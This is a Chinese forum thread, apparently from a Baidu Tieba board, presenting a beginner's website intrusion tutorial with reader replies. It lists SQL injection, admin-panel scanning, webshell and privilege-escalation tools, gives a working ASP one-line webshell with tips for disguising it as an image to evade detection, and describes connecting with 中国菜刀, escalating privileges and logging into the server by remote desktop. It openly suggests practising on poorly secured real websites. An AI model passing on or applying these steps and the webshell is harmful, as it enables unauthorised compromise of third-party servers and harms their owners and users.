简单的入侵教程小白可以看看,大佬勿喷
fiddler吧
全部回复
仅看楼主
level 9
简单的入侵教程小白可以看看,大佬勿喷
2019年09月02日 02点09分 1
level 9
1、找注入 爆账号
啊D和明小子
2、注入工具
椰树扫描、流光、Pangolin(穿山甲)、havij(胡萝卜)
3、找后台
御剑后台扫描、wwwscan扫描器
4、传小马
各种一句话木马、中国菜刀、中国蚁剑
5、提权
pr提权工具、黑协提权工具
接下来就直接渗透一个网站案例,来演示各种工具的使用方法:
实验环境大家可以用虚拟机或者本地进行模拟操作,或者找些漏洞较多,比较垃圾的网站进行操作。
2019年09月02日 02点09分 2
level 9
演示开始:
步骤一:找注入
打开浏览器,推荐用火狐浏览器或谷歌浏览器。
出现下图的页面,这里用ie演示。
2019年09月02日 02点09分 3
level 9
IE浏览器的选项设置,新手建议全部显示反馈的错误信息,根据实际情况来,就可以准确的判断网页的信息。
直接用啊D注入工具和明小子配合检测使用
2019年09月02日 02点09分 4
level 9
点击右上角的检测开始注入检测
2019年09月02日 02点09分 7
level 9
步骤三:找后台【可以用御剑后台扫描器扫描】
此步骤为找到网站的管理后台
2019年09月02日 02点09分 9
level 9
做个木马,打开txt文档,写上asp一句话<%eval request("x")%>,密码是x。并且把文件类型改成图片,不要只写一行代码,不大不小,100行差不多
2019年09月02日 02点09分 12
level 9
然后,就可以用菜刀,连接刚才复制到根目录的xbk.asp文件(木马)。
打开菜刀,在空白处右键——添加,输入木马的地址和网站。
2019年09月02日 02点09分 14
1
2020年01月01日 02点01分
level 9
不仅仅这种方法可以成功,不同的思路可以转变,或许过程会很顺利,也或者防护很多,没办法顺利入侵成功。
执行完成后,打开远程桌面,用刚才提权的账号,进入服务器。
2019年09月02日 02点09分 16
level 9
到此为止,一个完整的渗透过程结束,已经成功获得服务器的管理权限了。
2019年09月02日 02点09分 17
有全套下载地址么?大佬
2020年03月10日 15点03分
level 2
怎么联系你 大佬
2019年09月03日 09点09分 19
联系我干嘛
2019年09月04日 06点09分
2019年09月22日 09点09分
level 1
什么年代的教程了,太老了吧
2019年10月02日 22点10分 20
level 4
大哥,我玩抓包的,能不能带带我,求带
2019年10月06日 23点10分 21
一起玩啊
2019年11月09日 02点11分
兄弟留个联系方式,一起玩。
2019年11月16日 22点11分
回复 清醒清醒😄 :留个联系方式
2019年12月05日 10点12分
我也玩抓包的可否一起探讨
2021年01月16日 08点01分
level 2
求大佬带
2019年12月09日 07点12分 22
level 1
注入检测闪退为啥呀 有没有大佬知道
2020年01月01日 04点01分 23
1 2 尾页